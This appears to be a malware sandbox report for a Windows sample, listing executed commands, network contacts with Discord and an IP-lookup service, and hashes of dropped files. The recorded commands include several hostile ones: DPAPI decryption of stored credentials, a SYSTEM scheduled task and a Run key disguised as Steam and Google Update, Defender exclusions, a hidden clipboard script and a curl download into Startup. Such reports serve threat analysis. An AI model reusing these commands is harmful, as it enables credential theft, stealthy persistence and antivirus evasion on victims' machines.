"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\qtagxonl\qtagxonl.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4E3F.tmp" "c:\Users\Admin\AppData\Local\Temp\qtagxonl\CSCE75638D725114F8D869526969E6E8748.TMP"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,120,241,35,127,4,229,64,77,168,72,213,186,216,239,134,38,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,13,21,132,39,125,251,197,112,255,33,153,107,47,121,214,234,135,34,33,42,99,143,61,94,66,143,145,162,28,26,139,161,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,43,164,114,54,58,32,21,27,189,140,220,175,0,249,237,6,55,173,49,111,135,73,189,159,245,154,186,138,144,110,241,215,48,0,0,0,212,14,55,96,166,185,109,171,187,66,86,245,183,43,7,69,45,40,4,250,238,162,185,42,111,64,105,180,41,243,42,27,52,205,79,189,55,83,24,110,217,21,95,67,82,26,76,133,64,0,0,0,35,67,78,122,80,186,145,63,221,230,112,6,94,81,38,203,245,83,64,246,38,188,82,0,224,153,13,45,209,126,179,93,223,195,224,235,15,7,184,251,215,218,125,26,55,249,139,176,175,193,111,171,254,197,23,58,90,183,203,222,120,170,86,169), $null, 'CurrentUser')"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,120,241,35,127,4,229,64,77,168,72,213,186,216,239,134,38,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,13,21,132,39,125,251,197,112,255,33,153,107,47,121,214,234,135,34,33,42,99,143,61,94,66,143,145,162,28,26,139,161,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,43,164,114,54,58,32,21,27,189,140,220,175,0,249,237,6,55,173,49,111,135,73,189,159,245,154,186,138,144,110,241,215,48,0,0,0,212,14,55,96,166,185,109,171,187,66,86,245,183,43,7,69,45,40,4,250,238,162,185,42,111,64,105,180,41,243,42,27,52,205,79,189,55,83,24,110,217,21,95,67,82,26,76,133,64,0,0,0,35,67,78,122,80,186,145,63,221,230,112,6,94,81,38,203,245,83,64,246,38,188,82,0,224,153,13,45,209,126,179,93,223,195,224,235,15,7,184,251,215,218,125,26,55,249,139,176,175,193,111,171,254,197,23,58,90,183,203,222,120,170,86,169), $null, 'CurrentUser')

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,120,241,35,127,4,229,64,77,168,72,213,186,216,239,134,38,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,172,10,216,232,15,37,158,119,88,250,148,87,92,51,72,72,36,95,145,150,227,23,216,4,42,221,50,75,178,104,36,160,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,100,132,236,218,13,85,102,89,234,54,186,13,51,235,48,156,152,89,252,191,243,203,88,117,230,86,55,201,234,128,220,87,48,0,0,0,34,11,113,88,165,221,250,230,124,28,211,23,203,89,232,67,100,137,156,72,121,28,89,53,208,73,104,239,179,119,239,68,155,192,154,153,18,41,9,68,14,187,224,156,4,131,86,10,64,0,0,0,172,142,22,215,99,2,196,120,174,131,146,150,221,167,186,6,253,30,9,17,114,205,220,151,0,2,223,18,17,149,205,118,107,177,26,91,44,211,135,10,201,31,241,216,214,213,113,253,129,206,58,164,242,150,9,187,51,47,163,44,103,192,53,154), $null, 'CurrentUser')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,120,241,35,127,4,229,64,77,168,72,213,186,216,239,134,38,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,172,10,216,232,15,37,158,119,88,250,148,87,92,51,72,72,36,95,145,150,227,23,216,4,42,221,50,75,178,104,36,160,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,100,132,236,218,13,85,102,89,234,54,186,13,51,235,48,156,152,89,252,191,243,203,88,117,230,86,55,201,234,128,220,87,48,0,0,0,34,11,113,88,165,221,250,230,124,28,211,23,203,89,232,67,100,137,156,72,121,28,89,53,208,73,104,239,179,119,239,68,155,192,154,153,18,41,9,68,14,187,224,156,4,131,86,10,64,0,0,0,172,142,22,215,99,2,196,120,174,131,146,150,221,167,186,6,253,30,9,17,114,205,220,151,0,2,223,18,17,149,205,118,107,177,26,91,44,211,135,10,201,31,241,216,214,213,113,253,129,206,58,164,242,150,9,187,51,47,163,44,103,192,53,154), $null, 'CurrentUser')

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM"

C:\Windows\System32\Wbem\WMIC.exe

wmic diskdrive get serialnumber

C:\Windows\system32\reg.exe

reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1""

C:\Windows\system32\schtasks.exe

schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\wsaaxogk\wsaaxogk.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5321.tmp" "c:\Users\Admin\AppData\Local\Temp\wsaaxogk\CSC82BD7343C72445C29BBF7D71682CAEA.TMP"

C:\Windows\system32\cscript.EXE

C:\Windows\system32\cscript.EXE //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\ProgramData\edge\Updater\CheckEpicGamesLauncher.bat" "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Add-MpPreference -ExclusionPath "C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Add-MpPreference -ExclusionPath "C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Windows"

C:\Windows\system32\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\rename_me.exe" /f

C:\Windows\system32\reg.exe

reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam"

C:\Windows\system32\curl.exe

curl -o "C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Steam_Service.exe" YOUR-BINDED-EXE-LINK-HERE

C:\Windows\system32\cscript.EXE

C:\Windows\system32\cscript.EXE //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\ProgramData\edge\Updater\CheckEpicGamesLauncher.bat" "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Add-MpPreference -ExclusionPath "C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Add-MpPreference -ExclusionPath "C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Windows"

C:\Windows\system32\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\rename_me.exe" /f

C:\Windows\system32\reg.exe

reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam"

C:\Windows\system32\curl.exe

curl -o "C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Steam_Service.exe" YOUR-BINDED-EXE-LINK-HERE

C:\Windows\system32\cscript.EXE

C:\Windows\system32\cscript.EXE //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\ProgramData\edge\Updater\CheckEpicGamesLauncher.bat" "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Add-MpPreference -ExclusionPath "C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Add-MpPreference -ExclusionPath "C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Windows"

C:\Windows\system32\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\rename_me.exe" /f

C:\Windows\system32\reg.exe

reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam"

C:\Windows\system32\curl.exe

curl -o "C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Steam_Service.exe" YOUR-BINDED-EXE-LINK-HERE

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 api.ipify.org udp
US 8.8.8.8:53 discord.com udp
US 104.26.12.205:80 api.ipify.org tcp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 162.159.135.232:443 discord.com tcp
US 8.8.8.8:53 205.12.26.104.in-addr.arpa udp
US 8.8.8.8:53 232.135.159.162.in-addr.arpa udp
US 8.8.8.8:53 80.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 35.15.31.184.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 81.144.22.2.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 12.173.189.20.in-addr.arpa udp
N/A 224.0.0.251:5353 udp

Files

C:\Users\Admin\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\build\Release\node_sqlite3.node

MD5 66a65322c9d362a23cf3d3f7735d5430
SHA1 ed59f3e4b0b16b759b866ef7293d26a1512b952e
SHA256 f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c
SHA512 0a44d12852fc4c74658a49f886c4bc7c715c48a7cb5a3dcf40c9f1d305ca991dd2c2cb3d0b5fd070b307a8f331938c5213188cbb2d27d47737cc1c4f34a1ea21

C:\Users\Admin\AppData\Local\Temp\temp.ps1

MD5 18047e197c6820559730d01035b2955a
SHA1 277179be54bba04c0863aebd496f53b129d47464
SHA256 348342fd00e113a58641b2c35dd6a8f2c1fb2f1b16d8dff9f77b05f29e229ef3
SHA512 1942acd6353310623561efb33d644ba45ab62c1ddfabb1a1b3b1dd93f7d03df0884e2f2fc927676dc3cd3b563d159e3043d2eff81708c556431be9baf4ccb877

memory/3516-72-0x00007FFF04093000-0x00007FFF04095000-memory.dmp

memory/3516-73-0x0000027D2FEF0000-0x0000027D2FF12000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kkdyqtki.1ca.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3516-83-0x00007FFF04090000-0x00007FFF04B51000-memory.dmp

memory/3516-84-0x0000027D481B0000-0x0000027D481F4000-memory.dmp

memory/3516-85-0x00007FFF04090000-0x00007FFF04B51000-memory.dmp

memory/3516-86-0x0000027D488A0000-0x0000027D48916000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\qtagxonl\qtagxonl.cmdline

MD5 cbfdcd8f21614fdc28c5032b431c83d7
SHA1 a76c0146094a7b0afc812c4d4c4a6ea62cbe80a0
SHA256 0bb2165c898c881ff8dbb44d4a1ffa8d5597dec8678e0abc131fcca5334e5024
SHA512 6dc576434cfe366517447dc9e9417226d2b403ba711ab2b5c62a0ffa57233a89098671b4d11511d3ec44c930402f312cf5e012ff0b828b8438354df9a7876efd

\??\c:\Users\Admin\AppData\Local\Temp\qtagxonl\qtagxonl.0.cs

MD5 7bc8de6ac8041186ed68c07205656943
SHA1 673f31957ab1b6ad3dc769e86aedc7ed4b4e0a75
SHA256 36865e3bca9857e07b1137ada07318b9caaef9608256a6a6a7fd426ee03e1697
SHA512 0495839c79597e81d447672f8e85b03d0401f81c7b2011a830874c33812c54dab25b0f89a202bbb71abb4ffc7cb2c07cc37c008b132d4d5d796aebdd12741dba

\??\c:\Users\Admin\AppData\Local\Temp\qtagxonl\CSCE75638D725114F8D869526969E6E8748.TMP

MD5 f5aa8ab9bfa15e1afdc31ad7910cce9a
SHA1 318edda51a5a18af897d7972011e91787360cc5a
SHA256 07b600b541b9ed102f4b86bb2f743166f3d32e8838cebfc6335f4b33f4245a72
SHA512 d1fd74c08cc9760cfaf1a3b17ea07bd7f37af96741cafdcd646d2d8f8bae84575a350bb25cd34e1af0acbae613249a3cc49d3bbcfa8e0aaee92f904b424e1e0f

C:\Users\Admin\AppData\Local\Temp\RES4E3F.tmp

MD5 f28f611b4b4ae31f00d59de6badb31e6
SHA1 aed9413d0ee1ae2706c224f0fd14a485c2fb9a78
SHA256 63372527e34b36545ecf2de93e010ac614a6376b8831f80c0fd4068b9b0d59c6
SHA512 2641de770a7fb38b43ded6f888c8f466696529b8b43b5f02119d6f486fab6d1cb917085c4f07b5543153c8835c2d3d5bff6232e1dedd1535c28cc5666721e273

memory/3516-99-0x0000027D48190000-0x0000027D48198000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\qtagxonl\qtagxonl.dll

MD5 b75466c88ca71e774dd708c628e00dbc
SHA1 fb4ca035f3f7f9623e767e44b43d9a856bae6565
SHA256 5fcbd1ff5b52177368b1d1b491cc19e516602639dadd1c6cf9ba9c43421f7edb
SHA512 16ba581161da9c3c01749816081ade5ba12a222c77863dbbd39171dc130e222cef36943d50664a2d9599bce018bedd1cf43db4bf815521c40d2a55196ab4856f

memory/3516-103-0x00007FFF04090000-0x00007FFF04B51000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 3f01549ee3e4c18244797530b588dad9
SHA1 3e87863fc06995fe4b741357c68931221d6cc0b9
SHA256 36b51e575810b6af6fc5e778ce0f228bc7797cd3224839b00829ca166fa13f9a
SHA512 73843215228865a4186ac3709bf2896f0f68da0ba3601cc20226203dd429a2ad9817b904a45f6b0456b8be68deebf3b011742a923ce4a77c0c6f3a155522ab50

memory/4624-115-0x0000021F39050000-0x0000021F390A0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 b9c202c54da98e34e25288d7fdac9da3
SHA1 b784dd6b63a2448a2094ada321bc9f6d2be68538
SHA256 a5741d6df98a2590bec35b2b1705c56d5ba58efa41ca29835a5dd2ff0c06647c
SHA512 022cb7fcef7b99ee214ec009c33436aeded2c43fbca3ce2d67b46c83df9c13557be61a21daf208e485243ac101c80a8aef5af8cccbf233cce60a37c711d255dd

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 96b3afb559dba2789d3b19bd3efd2d0f
SHA1 576007e744c61eb0ec27df2cd877b268dd416850
SHA256 c452bf48d3a1bdb5bab53aa2216933751351ecbe56b3c752c2f8fd817c3e3657
SHA512 556f53849f657b935bfe56409169ae6925ea49c1d92b99b7c007038c537ee66a0a390062b1f84d8852b4680723272ab589963e15e229a446aad1d6f52e6a896f

C:\ProgramData\edge\Updater\Get-Clipboard.ps1

MD5 a8834c224450d76421d8e4a34b08691f
SHA1 73ed4011bc60ba616b7b81ff9c9cad82fb517c68
SHA256 817c184e6a3e7d1ff60b33ec777e23e8e0697e84efde8e422833f05584e00ea5
SHA512 672b3eca54dff4316db904d16c2333247e816e0cd8ef2d866111ddb49ab491568cc12d7263891707403dd14962326404c13855d5de1ae148114a51cb7d5e5596

\??\c:\Users\Admin\AppData\Local\Temp\wsaaxogk\wsaaxogk.cmdline

MD5 bf859d36a356ccce7ccec926352e0a5c
SHA1 3aaab8788919b7cb06735b60c2d5c43a28c52b46
SHA256 b5ba7f6a7cae6331f3bb1d13eccc0b1f23c93f57e33deac0c7ab82590846f6ce
SHA512 d077849b4b688701304b3e2a2ad57171615f4c4f5f027301fbb2f00b4fef5b30847c06f2fa66f87ff1a8e773877c916f291208cd84aef7b8a3a3e87505e6aa3c

\??\c:\Users\Admin\AppData\Local\Temp\wsaaxogk\wsaaxogk.0.cs

MD5 b462a7b0998b386a2047c941506f7c1b
SHA1 61e8aa007164305a51fa2f1cebaf3f8e60a6a59f
SHA256 a81f86cd4d33ebbf2b725df6702b8f6b3c31627bf52eb1cadc1e40b1c0c2bb35
SHA512 eb41b838cc5726f4d1601d3c68d455203d3c23f17469b3c8cbdd552f479f14829856d699f310dec05fe7504a2ae511d0b7ffff6b66ceadb5a225efe3e2f3a020

C:\Users\Admin\AppData\Local\Temp\RES5321.tmp

MD5 1cf41efbc2a2bd9da944f2d6f206ebbc
SHA1 321a2f8095530fe11effd1c15e9361173fadcd20
SHA256 1b8b19b64ce6fbcb1f36b9aa147ccb681867e2a9c6101b26d19cdc4353d3d788
SHA512 be3aa1ca23cb2cc420494e711d71122bf97806270699e038172170967eed5ccb00ed4fc97c6594dc4478e6dc03f3e5549869a39d80085ebfac347e2d23571081

memory/2576-170-0x00000185474A0000-0x00000185474A8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\wsaaxogk\wsaaxogk.dll

MD5 593b26bf4343dbe48edd9967f2a8523a
SHA1 691ed69991c09aedb7438f52f8e2300fbac44037
SHA256 4bd0eebdbfd2123752801f838489542c84f75fb417f9092accb77b5cf9f15832
SHA512 c54fe3c231f0032cf3ccf6aeabf07465bb7642a11ff55456175c010966155a586acc20b5420c523b5de3c3a019bddc1920dd682754a5a3de62541d9a538f4d33

\??\c:\Users\Admin\AppData\Local\Temp\wsaaxogk\CSC82BD7343C72445C29BBF7D71682CAEA.TMP

MD5 c310c21a12f668d8dc8aa4ee0ef6dc48
SHA1 fd782c180bdab896944ec58f998f2f7694d794e0
SHA256 b7c8a347e1a61dc846a18bd03e06ad6d646b6e512793272f4c4d2583d346f3d6
SHA512 d8c3cd6ff94fd19a11e16b00ec57d7792338b7db08be2a3994069fe72850222bcc0627ad1554973a5ff7cc0e9481f1f564250311af4b710bcc56a383c04cbb9c

C:\ProgramData\edge\Updater\RunBatHidden.vbs

MD5 14a9867ec0265ebf974e440fcd67d837
SHA1 ae0e43c2daf4c913f5db17f4d9197f34ab52e254
SHA256 cca09191a1a96d288a4873f79a0916d9984bd6be8dcbd0c25d60436d46a15ca1
SHA512 36c69c26fd84b9637b370a5fe214a90778c9ade3b11664e961fe14226e0300f29c2f43d3a1d1c655d9f2951918769259928bbbc5a9d83596a1afc42420fc1a54

C:\ProgramData\edge\Updater\CheckEpicGamesLauncher.bat

MD5 76504932b63282af2cc233847187611a
SHA1 a71e3b91a8381493b430b26720d42b3fab63c1cf
SHA256 53df92d96ef24cb6469c0ae6cafa553a46ebb3ffbcf2865d9a921fbdd1f3ecee
SHA512 61a45c3d9f23f0a625f28e1d5b24986a6016c65637c5d33720483c56aa27efe897139179f82d43c29b6b228d7de62f26965ef4fe3693aba38e1d4ccb44aab3b7

memory/2444-193-0x00000288CF4F0000-0x00000288CF50C000-memory.dmp

memory/2444-194-0x00000288CF510000-0x00000288CF5C5000-memory.dmp

memory/2444-195-0x00000288CF290000-0x00000288CF29A000-memory.dmp

memory/2444-196-0x00000288CF730000-0x00000288CF74C000-memory.dmp

memory/2444-197-0x00000288CF2A0000-0x00000288CF2AA000-memory.dmp

memory/2444-198-0x00000288CF750000-0x00000288CF76A000-memory.dmp

memory/2444-199-0x00000288CF710000-0x00000288CF718000-memory.dmp

memory/2444-200-0x00000288CF720000-0x00000288CF726000-memory.dmp

memory/2444-201-0x00000288CF770000-0x00000288CF77A000-memory.dmp

C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 bdb25c22d14ec917e30faf353826c5de
SHA1 6c2feb9cea9237bc28842ebf2fea68b3bd7ad190
SHA256 e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495
SHA512 b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c

C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 b42c70c1dbf0d1d477ec86902db9e986
SHA1 1d1c0a670748b3d10bee8272e5d67a4fabefd31f
SHA256 8ed3b348989cdc967d1fc0e887b2a2f5a656680d8d14ebd3cb71a10c2f55867a
SHA512 57fb278a8b2e83d01fac2a031c90e0e2bd5e4c1a360cfa4308490eb07e1b9d265b1f28399d0f10b141a6438ba92dd5f9ce4f18530ec277fece0eb7678041cbc5

C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 84c3d3551051e30076845584238d1d3b
SHA1 78e5dcc9789a828589ccc15f58ddf8815d0486f7
SHA256 ed64894a13a17f3c95a3aba90b450a621a9288406e8d8cb498113008df8ba872
SHA512 2fb28bcae3a1b9b245ca2a4dd5308d0d974f4e4b8f0e83593db0387a01518a926b5ad7846bfc766f46f240e29db0b33c8d79301d3343f8433b2b202d424e058a

C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d6dca4b21880d73819a6311222070915
SHA1 e9e5067b10df4b12a09cce19ff4206ec503b5001
SHA256 b130cc230899d99e648bc5efb5384f57f9765b1ba4743bc1a764b922d36efa4a
SHA512 50764325b16e24b15d01bb17149d0eb8fe1561d1262e95933ad69170da2ca7557b26709a53d6530e3ff9427e023b3fb12475ebcf310fde67360106148a766696

C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 7a22a7645143d402a64234676e82ec6d
SHA1 e52ec10a13b720abafa50d3e7efcc79153b55364
SHA256 9897ad03faf215e59eada73f29494197103f6470a08ffb52072017e6f22f9e8f
SHA512 37f8f5f8075ed684662bda94301a6b086b9be1774e4651782108879edcae20be986c5e3aef7eafdeb6cc82791ca620aeacce08574c4edb75c98ab6e681b29535

C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 c760880d6bc08cda4e37517b962c15c8
SHA1 f5ffa613e2160452ec84b89fe7a1d2fb5a1c1c12
SHA256 19a17a4c2670d8b8d6b08f4f8e07f3cc87c0c42634f0dbccc26f035185b56396
SHA512 4f7a4fa10f47a7bf3a7159e54e3c3dc89d0e950e8ef58cf34dda0f960916a4a5aee6adf3ba342326a591e34f7cbb03404700bb3578edb1fee3be1f439ae76ea0